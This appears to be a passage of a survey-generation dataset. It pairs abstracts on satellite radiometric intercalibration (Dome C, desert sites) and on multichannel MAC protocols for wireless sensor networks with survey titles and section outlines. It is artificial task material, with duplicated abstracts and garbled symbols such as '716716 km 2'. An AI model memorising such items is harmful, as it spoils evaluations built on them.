plateau of the East Antarctic ice sheet, particularly the Dome C area (75jS, 123jE), is used first to test the quality of this site as a ground calibration target and then to determine the inter-annual drift in the sensitivity of the VEGETATION sensor, onboard the SPOT4 satellite. Dome C area has many good calibration site characteristics: The site is very flat and extremely homogeneous (only snow), there is little wind and a very small snow accumulation rate and therefore a small temporal variability, the elevation is 3200 m and the atmosphere is very clear most of the time. Finally, due to its location, it is frequently within view of many satellites. VEGETATION visible blue channel data (0.43–0.47 Am) of a 716716 km 2 area centred on the French– Italian Dome Concordia station, during the 1998–1999, 1999–2000, 2001–2001, and 2001–2002 austral summers were cloud masked and atmospherically corrected. The snow surface Bidirectional Reflectance Distribution Function is very high with little spatial and seasonal variability, which is a major advantage for sensor calibration. The inter-annual variation is found to be very small, proving that the stability of the site is very good. --- paper_title: Establishing the Antarctic Dome C community reference standard site towards consistent measurements from Earth observation satellites paper_content: Establishing satellite measurement consistency by using common desert sites has become increasingly more important not only for climate change detection but also for quantitative retrievals of geophysical variables in satellite applications. Using the Antarctic Dome C site (75°06′S, 123°21′E, elevation 3.2 km) for satellite radiometric calibration and validation (Cal/Val) is of great interest owing to its unique location and characteristics. The site surface is covered with uniformly distributed permanent snow, and the atmospheric effect is small and relatively constant. In this study, the long-term stability and spectral characteristics of this site are evaluated using well-calibrated satellite instruments such as the Moderate Resolution Imaging Spectroradiometer (MODIS) and Sea-viewing Wide Field-of-view Sensor (SeaWiFS). Preliminary results show that despite a few limitations, the site in general is stable in the long term, the bidirectional reflectance distribution function (BRDF) model works well, an... --- paper_title: Spectral bidirectional reflectance of Antarctic snow: Measurements and parameterization paper_content: The bidirectional reflectance distribution function (BRDF) of snow was measured from a 32-m tower at Dome C, at latitude 75°S on the East Antarctic Plateau. These measurements were made at 96 solar zenith angles between 51° and 87° and cover wavelengths 350–2400 nm, with 3- to 30-nm resolution, over the full range of viewing geometry. The BRDF at 900 nm had previously been measured at the South Pole; the Dome C measurement at that wavelength is similar. At both locations the natural roughness of the snow surface causes the anisotropy of the BRDF to be less than that of flat snow. The inherent BRDF of the snow is nearly constant in the high-albedo part of the spectrum (350–900 nm), but the angular distribution of reflected radiance becomes more isotropic at the shorter wavelengths because of atmospheric Rayleigh scattering. Parameterizations were developed for the anisotropic reflectance factor using a small number of empirical orthogonal functions. Because the reflectance is more anisotropic at wavelengths at which ice is more absorptive, albedo rather than wavelength is used as a predictor in the near infrared. The parameterizations cover nearly all viewing angles and are applicable to the high parts of the Antarctic Plateau that have small surface roughness and, at viewing zenith angles less than 55°, elsewhere on the plateau, where larger surface roughness affects the BRDF at larger viewing angles. The root-mean-squared error of the parameterized reflectances is between 2% and 4% at wavelengths less than 1400 nm and between 5% and 8% at longer wavelengths. --- paper_title: Reflection of solar radiation by the Antarctic snow surface at ultraviolet, visible, and near-infrared wavelengths paper_content: The variation of snow albedo with wavelength across the solar spectrum from 0.3 μm in the ultraviolet (UV) to 2.5 μm in the near infrared (IR) was measured at Amundsen-Scott South Pole Station during the Antarctic summers of 1985–1986 and 1990–1991. Similar results were obtained at Vostok Station in summer 1990–1991. The albedo has a uniformly high value of 0.96–0.98 across the UV and visible spectrum, nearly independent of snow grain size and solar zenith angle, and this value probably applies throughout the interior of Antarctica. The albedo in the near IR is lower, dropping below 0.15 in the strong absorption bands at 1.5 and 2.0 μm; and it is quite sensitive to grain size and somewhat sensitive to zenith angle. Near-IR albedos were slightly lower at Vostok than at South Pole, but day-to-day variations in the measured grain size due to precipitation, drifting, and metamorphism were found to cause temporal variations in near-IR albedo larger than those due to any systematic geographical change from South Pole to Vostok. The spectrally averaged albedos ranged from 0.80 to 0.85 for both overcast and clear skies, in agreement with measurements by others at South Pole and elsewhere in Antarctica. Using a two-layer radiative transfer model, the albedo can be explained over the full wavelength range. Tests were made to correct for systematic errors in determining spectral albedo. Under clear skies at about 3000-m elevation the diffuse fraction of downward irradiance varied from 0.4 in the near UV to less than 0.01 in the near IR; knowledge of this fraction is required to correct the measured irradiance for the instrument's deviation from a perfect cosine-response. Furthermore, the deviation from cosine response is itself a function of wavelength. Under clear skies a significant error in apparent albedo can result if the instrument's cosine collector is not parallel to the surface; e.g., if the instrument is leveled parallel to the horizon, but the local snow surface is not horizontal. The soot content of the snow upwind of South Pole Station was only 0.3 ng/g. It was somewhat greater at Vostok Station but was still too small to affect the albedo at any wavelength. Bidirectional reflectance at 0.9-μm wavelength, measured from a 23-m tower at the end of summer after the sastrugi (snow dunes) had diminished, showed a pattern remarkably similar to the spectrally averaged pattern obtained from the Nimbus 7 satellite. --- paper_title: Vicarious Radiometric Calibrations of EOS Sensors paper_content: Abstract Four methods for the in-flight radiometric calibration and cross calibration of multispectral imaging sensors are described. Three make use of ground-based reflectance, irradiance, and radiance measurements in conjunction with atmospheric measurements and one compares calibrations between sensors. Error budgets for these methods are presented and their validation is discussed by reference to SPOT and TM results and shown to meet the EOS requirements in the solar-reflective range. --- paper_title: The Miami2001 Infrared Radiometer Calibration and Intercomparison. Part I: Laboratory Characterization of Blackbody Targets paper_content: Abstract The second calibration and intercomparison of infrared radiometers (Miami2001) was held at the University of Miami's Rosenstiel School of Marine and Atmospheric Science (RSMAS) during May–June 2001. The participants were from several groups involved with the validation of skin sea surface temperatures and land surface temperatures derived from the measurements of imaging radiometers on earth observation satellites. These satellite instruments include those currently on operational satellites and others that will be launched within two years following the workshop. There were two experimental campaigns carried out during the 1-week workshop: a set of measurements made by a variety of ship-based radiometers on board the Research Vessel F. G. Walton Smith in Gulf Stream waters off the eastern coast of Florida, and a set of laboratory measurements of typical external blackbodies used to calibrate these ship-based radiometers. This paper reports on the results obtained from the laboratory characteriza... --- paper_title: Reflectance quantities in optical remote sensing—definitions and case studies paper_content: Abstract The remote sensing community puts major efforts into calibration and validation of sensors, measurements, and derived products to quantify and reduce uncertainties. Given recent advances in instrument design, radiometric calibration, atmospheric correction, algorithm development, product development, validation, and delivery, the lack of standardization of reflectance terminology and products becomes a considerable source of error. This article provides full access to the basic concept and definitions of reflectance quantities, as given by Nicodemus et al. [Nicodemus, F.E., Richmond, J.C., Hsia, J.J., Ginsberg, I.W., and Limperis, T. (1977). Geometrical Considerations and Nomenclature for Reflectance. In: National Bureau of Standards, US Department of Commerce, Washington, D.C. URL: http://physics.nist.gov/Divisions/Div844/facilities/specphoto/pdf/geoConsid.pdf .] and Martonchik et al. [Martonchik, J.V., Bruegge, C.J., and Strahler, A. (2000). A review of reflectance nomenclature used in remote sensing. Remote Sensing Reviews, 19, 9–20.]. Reflectance terms such as BRDF, HDRF, BRF, BHR, DHR, black-sky albedo, white-sky albedo, and blue-sky albedo are defined, explained, and exemplified, while separating conceptual from measurable quantities. We use selected examples from the peer-reviewed literature to demonstrate that very often the current use of reflectance terminology does not fulfill physical standards and can lead to systematic errors. Secondly, the paper highlights the importance of a proper usage of definitions through quantitative comparison of different reflectance products with special emphasis on wavelength dependent effects. Reflectance quantities acquired under hemispherical illumination conditions (i.e., all outdoor measurements) depend not only on the scattering properties of the observed surface, but as well on atmospheric conditions, the object's surroundings, and the topography, with distinct expression of these effects in different wavelengths. We exemplify differences between the hemispherical and directional illumination quantities, based on observations (i.e., MISR), and on reflectance simulations of natural surfaces (i.e., vegetation canopy and snow cover). In order to improve the current situation of frequent ambiguous usage of reflectance terms and quantities, we suggest standardizing the terminology in reflectance product descriptions and that the community carefully utilizes the proposed reflectance terminology in scientific publications. --- paper_title: Spectral reflectance measurement methodologies for Tuz Golu field campaign paper_content: A field campaign had been organized in August 2010 on Tuz Golu salt lake, Turkey, with the aim of characterizing the site for satellite optical sensor vicarious calibration, and of comparing different methodologies of surface reflectance factor characterization. Several teams have made ground-based reflectance measurements with a field spectrometer on different areas of the salt lake of 100 m × 300 m and 1km × 1 km size. Different types of sampling strategies and measurements methods have been used by the participants, and are described in this paper. Preliminary results on one area are presented, that show a good agreement between the different measurements. --- paper_title: Reflectance- and radiance-based methods for the in-flight absolute calibration of multispectral sensors paper_content: Abstract Variations reported in the in-flight absolute radiometric calibration of the Coastal Zone Color Scanner (CZCS) and the Thematic Mapper (TM) on Landsat 4 are reviewed. At short wavelengths these sensors exhibited a gradual reduction in response, while in the midinfrared the TM showed oscillatory variations, according to the results of TM internal calibration. The methodology and results are presented for five reflectance-based calibrations of the Landsat 5 TM at White Sands, NM, in the period July 1984 to November 1985. These show a ±2.8% standard deviation (1 σ) for the six solar-reflective bands. Analysis and preliminary results of a second, independent calibration method based on radiance measurements from a helicopter at White Sands indicate that this is potentially an accurate method for corroborating the results from the reflectance-based method. --- paper_title: 2010 ceos field reflectance intercomparisons lessons learned paper_content: This paper summarizes lessons learned from the 2009 and 2010 joint field campaigns to Tuz Golu, Turkey. Emphasis is placed on the 2010 campaign related to understanding the equipment and measurement protocols, processing schemes, and traceability to SI quantities. Participants in both 2009 and 2010 used an array of measurement approaches to determine surface reflectance. One lesson learned is that even with all of the differences in collection between groups, the differences in reflectance are currently dominated by instrumental artifacts including knowledge of the white reference. Processing methodology plays a limited role once the bi-directional reflectance of the white reference is used rather than a hemispheric-directional value. The lack of a basic set of measurement protocols, or best practices, limits a group's ability to ensure SI traceability and the development of proper error budgets. Finally, rigorous attention to sampling methodology and its impact on instrument behavior is needed. The results of the 2009 and 2010 joint campaigns clearly demonstrate both the need and utility of such campaigns and such comparisons must continue in the future to ensure a coherent set of data that can span multiple sensor types and multiple decades. --- paper_title: The Miami2001 Infrared Radiometer Calibration and Intercomparison. Part II: Shipboard Results paper_content: The second calibration and intercomparison of infrared radiometers (Miami2001) was held at the University of Miami’s Rosenstiel School of Marine and Atmospheric Science (RSMAS) during a workshop held from May to June 2001. The radiometers targeted in these two campaigns (laboratory-based and at-sea measurements) are those used to validate the skin sea surface temperatures and land surface temperatures derived from the measurements of imaging radiometers on earth observation satellites. These satellite instruments include those on currently operational satellites and others that will be launched within two years following the workshop. The experimental campaigns were completed in one week and included laboratory measurements using blackbody calibration targets characterized by the National Institute of Standards and Technology (NIST), and an intercomparison of the radiometers on a short cruise on board the R/V F. G. Walton Smith in Gulf Stream waters off the eastern coast of Florida. This paper reports on the results obtained from the shipborne measurements. Seven radiometers were mounted alongside each other on the R/V Walton Smith for an intercomparison under seagoing conditions. The ship results confirm that all radiometers are suitable for the validation of land surface temperature, and the majority are able to provide high quality data for the more difficult validation of satellitederived sea surface temperature, contributing less than 0.1 K to the error budget of the validation. The measurements provided by two prototype instruments developed for ship-of-opportunity use confirmed their potential to provide regular reliable data for satellite-derived SST validation. Four high quality radiometers showed agreements within 0.05 K confirming that these instruments are suitable for detailed studies of the dynamics of air‐sea interaction at the ocean surface as well as providing high quality validation data. The data analysis confirms the importance of including an accurate correction for reflected sky radiance when using infrared radiometers to measure SST. The results presented here also show the value of regular intercomparisons of ground-based instruments that are to be used for the validation of satellite-derived data products—products that will be an essential component of future assessments of climate change and variability. --- paper_title: Cross Calibration Over Desert Sites: Description, Methodology, and Operational Implementation paper_content: Radiometric cross calibration of Earth observation sensors is a crucial need to guarantee or quantify the consistency of measurements from different sensors. Twenty desert sites, historically selected, are revisited, and their radiometric profiles are described for the visible to the near-infrared spectral domain. Therefore, acquisitions by various sensors over these desert sites are collected into a dedicated database, Structure d'Accueil des Donnees d'Etalonnage, defined to manage operational calibrations and the required SI traceability. The cross-calibration method over desert sites is detailed. Surface reflectances are derived from measurements by a reference sensor and spectrally interpolated to derive the surface and then top-of-atmosphere reflectances for spectral bands of the sensor to calibrate. The comparison with reflectances really measured provides an estimation of the cross calibration between the two sensors. Results illustrate the efficiency of the method for various pairs of sensors among AQUA-Moderate Resolution Imaging Spectroradiometer (MODIS), Environmental Satellite-Medium Resolution Imaging Spectrometer (MERIS), Polarization and Anisotropy of Reflectance for Atmospheric Sciences Couples With Observations From a Lidar (PARASOL)-Polarization and Directionality of the Earth Reflectances (POLDER), and Satellite pour l'Observation de la Terre 5 (SPOT5)-VEGETATION. MERIS and MODIS calibrations are found to be very consistent, with a discrepancy of 1%, which is close to the accuracy of the method. A larger bias of 3% was identified between VEGETATION-PARASOL on one hand and MERIS-MODIS on the other hand. A good consistency was found between sites, with a standard deviation of 2% for red to near-infrared bands, increasing to 4% and 6% for green and blue bands, respectively. The accuracy of the method, which is close to 1%, may also depend on the spectral bands of both sensor to calibrate and reference sensor (up to 5% in the worst case) and their corresponding geometrical matching. ---
Title: Overview of Intercalibration of Satellite Instruments Section 1: Introduction Description 1: Provide an introduction and describe the general importance of intercalibration for satellite instruments. Section 2: Need for Intercalibration Description 2: Explain the necessity of intercalibrating satellite instruments, addressing issues of traceability and interoperability. Section 3: General Intercalibration Problems Description 3: Outline common problems encountered during the intercalibration process, including traceability, sampling differences, and scene variability. Section 4: Intercalibration Methods Description 4: Summarize various methods used for intercalibrating satellite instruments, such as SNO, statistical intercalibration, and double-differencing methods. Section 5: Ongoing Joint Efforts Description 5: Describe current collaborative efforts, such as GSICS and CEOS, aimed at standardizing and improving intercalibration practices. Section 6: Summary Description 6: Provide a summary of the key points discussed in the paper, emphasizing the importance of intercalibration for the consistency and accuracy of satellite observations.
A survey on multichannel assignment protocols in Wireless Sensor Networks
10
--- paper_title: Protocols and architectures for channel assignment in wireless mesh networks paper_content: The use of multiple channels can substantially improve the performance of wireless mesh networks. Considering that the IEEE PHY specification permits the simultaneous operation of three non-overlapping channels in the 2.4GHz band and 12 non-overlapping channels in the 5GHz band, a major challenge in wireless mesh networks is how to efficiently assign these available channels in order to optimize the network performance. We survey and classify the current techniques proposed to solve this problem in both single-radio and multi-radio wireless mesh networks. This paper also discusses the issues in the design of multi-channel protocols and architectures. --- paper_title: Multi-channel mac for ad hoc networks: handling multi-channel hidden terminals using a single transceiver paper_content: This paper proposes a medium access control (MAC) protocol for ad hoc wireless networks that utilizes multiple channels dynamically to improve performance. The IEEE 802.11 standard allows for the use of multiple channels available at the physical layer, but its MAC protocol is designed only for a single channel. A single-channel MAC protocol does not work well in a multi-channel environment, because of the multi-channel hidden terminal problem . Our proposed protocol enables hosts to utilize multiple channels by switching hannels dynamically, thus increasing network throughput. The protocol requires only one transceiver per host, but solves the multi-channel hidden terminal problem using temporal synchronization. Our scheme improves network throughput signifiantly, especially when the network is highly congested. The simulation results show that our protocol successfully exploits multiple hannels to achieve higher throughput than IEEE 802.11. Also, the performance of our protocol is comparable to another multi-hannel MAC protocol that requires multiple transceivers per host. Since our protocol requires only one transceiver per host, it an be implemented with a hardware complexity comparable to IEEE 802.11. --- paper_title: TDMA-ASAP: Sensor Network TDMA Scheduling with Adaptive Slot-Stealing and Parallelism paper_content: TDMA has been proposed as a MAC protocol for wireless sensor networks (WSNs) due to its efficiency in high WSN load. However, TDMA is plagued with shortcomings; we present modifications to TDMA that will allow for the same efficiency of TDMA, while allowing the network to conserve energy during times of low load (when there is no activity being detected). Recognizing that aggregation plays an essential role in WSNs, TDMA-ASAP adds to TDMA: (a) transmission parallelism based on a level-by-level localized graph-coloring, (b) appropriate sleeping between transmissions ("napping"), (c) judicious and controlled TDMA slot stealing to avoid empty slots to be unused and (d) intelligent scheduling/ordering transmissions. Our results show that TDMA-ASAP's unique combination of TDMA, slot-stealing, napping, and message aggregation significantly outperforms other hybrid WSN MAC algorithms and has a performance that is close to optimal in terms of energy consumption and overall delay. --- paper_title: Z-MAC: a hybrid MAC for wireless sensor networks paper_content: This paper presents the design, implementation and performance evaluation of a hybrid MAC protocol, called Z-MAC, for wireless sensor networks that combines the strengths of TDMA and CSMA while offsetting their weaknesses. Like CSMA, Z-MAC achieves high channel utilization and low latency under low contention and like TDMA, achieves high channel utilization under high contention and reduces collision among two-hop neighbors at a low cost. A distinctive feature of Z-MAC is that its performance is robust to synchronization errors, slot assignment failures, and time-varying channel conditions; in the worst case, its performance always falls back to that of CSMA. Z-MAC is implemented in TinyOS. --- paper_title: EM-MAC: a dynamic multichannel energy-efficient MAC protocol for wireless sensor networks paper_content: Medium access control (MAC) protocols for wireless sensor networks face many challenges, including energy-efficient operation and robust support for varying traffic loads, in spite of effects such as wireless interference or even possible wireless jamming attacks. This paper presents the design and evaluation of the EM-MAC (Efficient Multichannel MAC) protocol, which addresses these challenges through the introduction of novel mechanisms for adaptive receiver-initiated multichannel rendezvous and predictive wake-up scheduling. EM-MAC substantially enhances wireless channel utilization and transmission efficiency while resisting wireless interference and jamming by enabling every node to dynamically optimize the selection of wireless channels it utilizes based on the channel conditions it senses, without use of any reserved control channel. EM-MAC achieves high energy efficiency by enabling a sender to predict the receiver's wake-up channel and wake-up time Implemented in TinyOS on MICAz motes, EM-MAC substantially outperformed other MAC protocols studied. EM-MAC maintained the lowest sender and receiver duty cycles, the lowest packet delivery latency, and 100% packet delivery ratio across all experiments. Our evaluation includes single-hop and multihop flows, as well as experiments with heavy ZigBee interference, constant ZigBee jamming, and Wi-Fi interference. --- paper_title: Low-overhead dynamic multi-channel MAC for wireless sensor networks paper_content: Most of the existing popular MAC protocols for Wireless Sensor Networks (WSN) only use a single channel for relaying data. Most popular platforms however are equipped with a radio chip capable of switching its channel, and are therefor not restricted to a single-channel operation. Operating on multiple channels can increase bandwidth and can provide robustness against external interference. We argue that this feature is not only useful for dense, high-throughput WSNs but also for sparser networks with low average data rates but with occasional traffic bursts. We present MuChMAC, a low-overhead Multi-Channel MAC protocol which uses a combination of TDMA and asynchronous MAC techniques to exploit multi-channel operation without the need for coordination or tight synchronization between nodes. We describe an interface to scale MuChMAC’s duty cycle to adapt to varying traffic conditions or energy constraints. We demonstrate MuChMAC’s usefulness on a testbed consisting out Sentilla JCreate motes running it as the MAC layer for Contiki-based applications. --- paper_title: MMSN: Multi-Frequency Media Access Control for Wireless Sensor Networks paper_content: Multi-frequency media access control has been well understood in general wireless ad hoc networks, while in wireless sensor networks, researchers still focus on single frequency solutions. In wireless sensor networks, each device is typically equipped with a single radio transceiver and applications adopt much smaller packet sizes compared to those in general wireless ad hoc networks. Hence, the multi-frequency MAC protocols proposed for general wireless ad hoc networks are not suitable for wireless sensor network applications, which we further demonstrate through our simulation experiments. In this paper, we propose MMSN, which takes advantage of multi-frequency availability while, at the same time, takes into account the restrictions in wireless sensor networks. In MMSN, four frequency assignment options are provided to meet different application requirements. A scalable media access is designed with efficient broadcast support. Also, an optimal non-uniform backoff algorithm is derived and its lightweight approximation is implemented in MMSN, which significantly reduces congestion in the time synchronized media access design. Through extensive experiments, MMSN exhibits prominent ability to utilize parallel transmission among neighboring nodes. It also achieves increased energy efficiency when multiple physical frequencies are available. --- paper_title: Traffic-Aware Channel Assignment in Wireless Sensor Networks paper_content: Existing frequency assignment efforts in wireless sensor network research focus on balancing available physical frequencies among neighboring nodes, without paying attention to the fact that different nodes have different traffic volumes. Ignoring the different traffic requirements in different nodes in frequency assignment design leads to poor MAC performance. Therefore, in this paper, we are motivated to propose traffic-aware frequency assignment, which considers nodes' traffic volumes when making frequency decisions. We incorporate our traffic-aware frequency assignment design into an existing multi-channel MAC, and compare the performance with two conventional frequency assignment schemes. Our performance evaluation demonstrates that traffic-aware channel assignment can greatly improve multi-channel MAC performance. Our traffic-aware assignment scheme greatly enhances the packet delivery ratio and system throughput, while reducing channel access delay and energy consumption. --- paper_title: ARM: An asynchronous receiver-initiated multichannel MAC protocol with duty cycling for WSNs paper_content: This paper proposes ARM, an receiver-initiated MAC protocol with duty cycling to tackle control channel saturation, triple hidden terminal and low broadcast reliability problems in asynchronous multi-channel WSNs. By adopting a receiver-initiated transmission scheme and probability-based random channel selection, ARM effectively solves control channel saturation and triple hidden terminal problems. Further, ARM employs a receiver-adjusted broadcast scheme to guarantee broadcast reliability for broadcast-intensive applications. Via the theoretical analysis, two factors that assist ARM to handle these problems are derived. The simulation and real testbed experimental results show that via solving these three problems ARM achieves significant improvement in energy efficiency and throughput. Moreover, ARM exhibits a prominent ability to enhance its broadcast reliability. --- paper_title: Realistic and Efficient Multi-Channel Communications in Wireless Sensor Networks paper_content: This paper demonstrates how to use multiple channels to improve communication performance in Wireless Sensor Networks (WSNs). We first investigate multi-channel realities in WSNs through intensive empirical experiments with Micaz motes. Our study shows that current multi-channel protocols are not suitable for WSNs, because of the small number of available channels and unavoidable time errors found in real networks. With these observations, we propose a novel tree-based multichannel scheme for data collection applications, which allocates channels to disjoint trees and exploits parallel transmissions among trees. In order to minimize interference within trees, we define a new channel assignment problem which is proven NP- complete. Then we propose a greedy channel allocation algorithm which outperforms other schemes in dense networks with a small number of channels.We implement our protocol, called TMCP, in a real testbed. Through both simulation and real experiments, we show that TMCP can significantly improve network throughput and reduce packet losses. More importantly, evaluation results show that TMCP better accommodates multi-channel realities found in WSNs than other multi-channel protocols. --- paper_title: Y-MAC: An Energy-Efficient Multi-channel MAC Protocol for Dense Wireless Sensor Networks paper_content: As the use of wireless sensor networks (WSNs) becomes widespread, node density tends to increase. This poses a new challenge for Medium Access Control (MAC) protocol design. Although traditional MAC protocols achieve low-power operation, they use only a single channel which limits their performance. Several multi-channel MAC protocols for WSNs have been recently proposed. One of the key observations is that these protocols are less energy efficient than single-channel MAC protocols under light traffic conditions. In this paper, we propose an energy efficient multi-channel MAC protocol, Y-MAC, for WSNs. Our goal is to achieve both high performance and energy efficiency under diverse traffic conditions. In contrast to most of previous multi-channel MAC protocols for WSNs, we implemented Y-MAC on a real sensor node platform and conducted extensive experiments to evaluate its performance. Experimental results show that Y-MAC is energy efficient and maintains high performance under high-traffic conditions. --- paper_title: Regret Matching Based Channel Assignment for Wireless Sensor Networks paper_content: Multiple channels in Wireless Sensor Networks (WSNs) are often exploited to support parallel transmission and reduce interference. However, there are many challenges, such as extra communication overhead, posed to the energy constraint of WSNs by the multi-channel usage coordination. In this paper, we propose a Regret Matching based Channel Assignment algorithm (RMCA) to address those challenges. The advantage of RMCA is that it is highly distributed and requires very limited information exchanges among sensor nodes. It converges almost surely to the set of correlated equilibrium. Moreover, RMCA can adapt the channel assignment among sensor nodes to the time-variant flows and network topology. Simulations show that RMCA achieves good network performance in terms of both delivery ratio and packet latency. --- paper_title: EM-MAC: a dynamic multichannel energy-efficient MAC protocol for wireless sensor networks paper_content: Medium access control (MAC) protocols for wireless sensor networks face many challenges, including energy-efficient operation and robust support for varying traffic loads, in spite of effects such as wireless interference or even possible wireless jamming attacks. This paper presents the design and evaluation of the EM-MAC (Efficient Multichannel MAC) protocol, which addresses these challenges through the introduction of novel mechanisms for adaptive receiver-initiated multichannel rendezvous and predictive wake-up scheduling. EM-MAC substantially enhances wireless channel utilization and transmission efficiency while resisting wireless interference and jamming by enabling every node to dynamically optimize the selection of wireless channels it utilizes based on the channel conditions it senses, without use of any reserved control channel. EM-MAC achieves high energy efficiency by enabling a sender to predict the receiver's wake-up channel and wake-up time Implemented in TinyOS on MICAz motes, EM-MAC substantially outperformed other MAC protocols studied. EM-MAC maintained the lowest sender and receiver duty cycles, the lowest packet delivery latency, and 100% packet delivery ratio across all experiments. Our evaluation includes single-hop and multihop flows, as well as experiments with heavy ZigBee interference, constant ZigBee jamming, and Wi-Fi interference. --- paper_title: Multi-channel mac for ad hoc networks: handling multi-channel hidden terminals using a single transceiver paper_content: This paper proposes a medium access control (MAC) protocol for ad hoc wireless networks that utilizes multiple channels dynamically to improve performance. The IEEE 802.11 standard allows for the use of multiple channels available at the physical layer, but its MAC protocol is designed only for a single channel. A single-channel MAC protocol does not work well in a multi-channel environment, because of the multi-channel hidden terminal problem . Our proposed protocol enables hosts to utilize multiple channels by switching hannels dynamically, thus increasing network throughput. The protocol requires only one transceiver per host, but solves the multi-channel hidden terminal problem using temporal synchronization. Our scheme improves network throughput signifiantly, especially when the network is highly congested. The simulation results show that our protocol successfully exploits multiple hannels to achieve higher throughput than IEEE 802.11. Also, the performance of our protocol is comparable to another multi-hannel MAC protocol that requires multiple transceivers per host. Since our protocol requires only one transceiver per host, it an be implemented with a hardware complexity comparable to IEEE 802.11. --- paper_title: Protocols and architectures for channel assignment in wireless mesh networks paper_content: The use of multiple channels can substantially improve the performance of wireless mesh networks. Considering that the IEEE PHY specification permits the simultaneous operation of three non-overlapping channels in the 2.4GHz band and 12 non-overlapping channels in the 5GHz band, a major challenge in wireless mesh networks is how to efficiently assign these available channels in order to optimize the network performance. We survey and classify the current techniques proposed to solve this problem in both single-radio and multi-radio wireless mesh networks. This paper also discusses the issues in the design of multi-channel protocols and architectures. --- paper_title: MMSN: Multi-Frequency Media Access Control for Wireless Sensor Networks paper_content: Multi-frequency media access control has been well understood in general wireless ad hoc networks, while in wireless sensor networks, researchers still focus on single frequency solutions. In wireless sensor networks, each device is typically equipped with a single radio transceiver and applications adopt much smaller packet sizes compared to those in general wireless ad hoc networks. Hence, the multi-frequency MAC protocols proposed for general wireless ad hoc networks are not suitable for wireless sensor network applications, which we further demonstrate through our simulation experiments. In this paper, we propose MMSN, which takes advantage of multi-frequency availability while, at the same time, takes into account the restrictions in wireless sensor networks. In MMSN, four frequency assignment options are provided to meet different application requirements. A scalable media access is designed with efficient broadcast support. Also, an optimal non-uniform backoff algorithm is derived and its lightweight approximation is implemented in MMSN, which significantly reduces congestion in the time synchronized media access design. Through extensive experiments, MMSN exhibits prominent ability to utilize parallel transmission among neighboring nodes. It also achieves increased energy efficiency when multiple physical frequencies are available. --- paper_title: Traffic-Aware Channel Assignment in Wireless Sensor Networks paper_content: Existing frequency assignment efforts in wireless sensor network research focus on balancing available physical frequencies among neighboring nodes, without paying attention to the fact that different nodes have different traffic volumes. Ignoring the different traffic requirements in different nodes in frequency assignment design leads to poor MAC performance. Therefore, in this paper, we are motivated to propose traffic-aware frequency assignment, which considers nodes' traffic volumes when making frequency decisions. We incorporate our traffic-aware frequency assignment design into an existing multi-channel MAC, and compare the performance with two conventional frequency assignment schemes. Our performance evaluation demonstrates that traffic-aware channel assignment can greatly improve multi-channel MAC performance. Our traffic-aware assignment scheme greatly enhances the packet delivery ratio and system throughput, while reducing channel access delay and energy consumption. --- paper_title: ARM: An asynchronous receiver-initiated multichannel MAC protocol with duty cycling for WSNs paper_content: This paper proposes ARM, an receiver-initiated MAC protocol with duty cycling to tackle control channel saturation, triple hidden terminal and low broadcast reliability problems in asynchronous multi-channel WSNs. By adopting a receiver-initiated transmission scheme and probability-based random channel selection, ARM effectively solves control channel saturation and triple hidden terminal problems. Further, ARM employs a receiver-adjusted broadcast scheme to guarantee broadcast reliability for broadcast-intensive applications. Via the theoretical analysis, two factors that assist ARM to handle these problems are derived. The simulation and real testbed experimental results show that via solving these three problems ARM achieves significant improvement in energy efficiency and throughput. Moreover, ARM exhibits a prominent ability to enhance its broadcast reliability. --- paper_title: Multi-Channel Assignment in Wireless Sensor Networks: A Game Theoretic Approach paper_content: In this paper, we formulate multi-channel assignment in Wireless Sensor Networks (WSNs) as an optimization problem and show it is NP-hard. We then propose a distributed Game Based Channel Assignment algorithm (GBCA) to solve the problem. GBCA takes into account both the network topology information and transmission routing information. We prove that there exists at least one Nash Equilibrium in the channel assignment game. Furthermore, we analyze the sub-optimality of Nash Equilibrium and the convergence of the Best Response in the game. Simulation results are given to demonstrate that GBCA can reduce interference significantly and achieve satisfactory network performance in terms of delivery ratio, throughput, channel access delay and energy consumption. --- paper_title: Y-MAC: An Energy-Efficient Multi-channel MAC Protocol for Dense Wireless Sensor Networks paper_content: As the use of wireless sensor networks (WSNs) becomes widespread, node density tends to increase. This poses a new challenge for Medium Access Control (MAC) protocol design. Although traditional MAC protocols achieve low-power operation, they use only a single channel which limits their performance. Several multi-channel MAC protocols for WSNs have been recently proposed. One of the key observations is that these protocols are less energy efficient than single-channel MAC protocols under light traffic conditions. In this paper, we propose an energy efficient multi-channel MAC protocol, Y-MAC, for WSNs. Our goal is to achieve both high performance and energy efficiency under diverse traffic conditions. In contrast to most of previous multi-channel MAC protocols for WSNs, we implemented Y-MAC on a real sensor node platform and conducted extensive experiments to evaluate its performance. Experimental results show that Y-MAC is energy efficient and maintains high performance under high-traffic conditions. --- paper_title: Regret Matching Based Channel Assignment for Wireless Sensor Networks paper_content: Multiple channels in Wireless Sensor Networks (WSNs) are often exploited to support parallel transmission and reduce interference. However, there are many challenges, such as extra communication overhead, posed to the energy constraint of WSNs by the multi-channel usage coordination. In this paper, we propose a Regret Matching based Channel Assignment algorithm (RMCA) to address those challenges. The advantage of RMCA is that it is highly distributed and requires very limited information exchanges among sensor nodes. It converges almost surely to the set of correlated equilibrium. Moreover, RMCA can adapt the channel assignment among sensor nodes to the time-variant flows and network topology. Simulations show that RMCA achieves good network performance in terms of both delivery ratio and packet latency. ---
Title: A survey on multichannel assignment protocols in Wireless Sensor Networks Section 1: INTRODUCTION Description 1: This section should introduce the need for multichannel assignment protocols in Wireless Sensor Networks (WSNs) and the challenges they address. Section 2: ISSUES IN MULTICHANNEL COMMUNICATIONS Description 2: This section should discuss the new problems and complexities introduced by multichannel communication compared to single channel communication. Section 3: COMMUNICATIONS Description 3: This section should summarize the benefits brought by multichannel communications, such as increased parallel transmission and robustness. Section 4: CLASSIFICATION OF EXISTING MULTICHANNEL ASSIGNMENT PROTOCOLS IN WSNS Description 4: This section should classify existing multichannel assignment protocols based on channel assignment methods, channel selection policies, and channel coordination techniques. Section 5: Channel assignment method Description 5: This subsection should categorize channel assignment methods into static, semi-dynamic, and dynamic, and discuss the trade-offs of each. Section 6: Channel selection policy Description 6: This subsection should explain the various policies for selecting channels, such as Round Robin, least load channel, and probabilistic methods. Section 7: Channel coordination Description 7: This subsection should describe the methods for coordinating channels between the sender and receiver, including implicit and explicit coordination, and their respective techniques. Section 8: Discussion Description 8: This subsection should explore the relationships between different channel assignment and coordination techniques. Section 9: TAXONOMY PROPOSED Description 9: This section should provide a proposed taxonomy for multichannel protocols based on specific criteria and analyze existing protocols according to these criteria. Section 10: CONCLUSION Description 10: This section should summarize the challenges and future directions for multichannel communications in WSNs.
